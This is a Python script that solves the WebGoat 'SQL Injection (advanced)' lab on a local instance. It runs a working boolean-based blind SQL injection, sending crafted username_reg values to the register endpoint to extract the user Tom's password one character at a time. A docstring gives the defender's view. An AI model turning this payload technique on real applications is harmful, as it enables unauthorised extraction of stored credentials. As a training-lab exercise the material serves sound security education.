import json
import os

import requests
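def main():
    """Solve the WebGoat "SQL Injection (advanced)" registration lesson.

    The script talks only to a local WebGoat instance. It sends PUT requests
    to the lesson's register endpoint with a ``username_reg`` value that
    closes the quoted string and appends a condition on
    ``substring(password,1,i)``. A feedback message containing
    "already exists" is taken to mean the condition was true, and the
    password prefix grows by one character. The search stops at 25
    characters or at the first position where no candidate matches.

    Defender's view: the lesson works because the response differs depending
    on a condition the client controls. Presumably the lesson builds its
    lookup query by concatenating ``username_reg`` into SQL (the server code
    is not shown here). Bind parameters in that query remove the injection,
    and one request per guess from a single session is a pattern worth
    alerting on.
    """
    url = "http://localhost:8080/WebGoat/SqlInjectionAdvanced/register"
    # Session cookie of a logged-in lab user. A session token in source ends
    # up in pastes and repositories, so prefer the environment variable; the
    # literal is kept only as the backward-compatible default.
    session_id = os.environ.get(
        "WEBGOAT_JSESSIONID", "3CF43BAE22DD939DC9595A038C811E68"
    )

    headers = {
        "Cookie": f"JSESSIONID={session_id}",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    }

    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

    password = ""

    for i in range(1, 26):  # password assumed to be at most 25 characters
        found = False
        had_error = False
        for c in charset:
            attempt = password + c
            payload = f"tom' and substring(password,1,{i})='{attempt}"
            data = {
                "username_reg": payload,
                "email_reg": "test@test.com",
                "password_reg": "abc",
                "confirm_password_reg": "abc",
            }

            # Without a timeout a stalled lab server blocks the script forever.
            try:
                r = requests.put(url, headers=headers, data=data, timeout=10)
            except requests.RequestException as exc:
                print(f"[!] Request failed at position {i} ({password!r} so far): {exc}")
                return

            if r.status_code != 200:
                had_error = True
                print(f"{c} -> [HTTP {r.status_code}]: {r.text}")
                continue

            try:
                body = json.loads(r.text)
            except json.JSONDecodeError:
                feedback = "[Invalid JSON in response]"
            else:
                # The body may be valid JSON without being an object, and
                # "feedback" may be null; both would break the substring test.
                feedback = body.get("feedback") if isinstance(body, dict) else None
                if not isinstance(feedback, str):
                    feedback = "[No feedback in response]"

            print(f"{attempt} -> {feedback}")

            if "already exists" in feedback:
                password += c
                print(f"[+] Found character {i}: {c} -> {password}")
                found = True
                break

        if not found:
            if had_error:
                # Non-200 answers are not evidence that the password ended,
                # e.g. an expired session fails every request.
                print(f"[!] No match at position {i}, but some requests failed; result may be incomplete.")
            else:
                print(f"[!] End of password detected at position {i}. Stopping.")
            break

    print(f"[+] Final password for Tom: {password}")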
# Run the lab exercise only when this file is executed as a script,
# so importing the module never sends requests.
if __name__ == "__main__":
    main()